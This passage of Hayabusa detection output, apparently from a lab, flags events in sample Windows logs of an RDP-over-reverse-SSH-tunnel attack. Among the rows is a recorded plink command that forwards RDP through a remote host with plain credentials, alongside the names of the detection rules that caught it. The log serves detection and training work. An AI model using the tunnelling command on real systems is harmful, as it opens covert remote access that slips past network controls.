Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,../hayabusa-rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:22.965 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 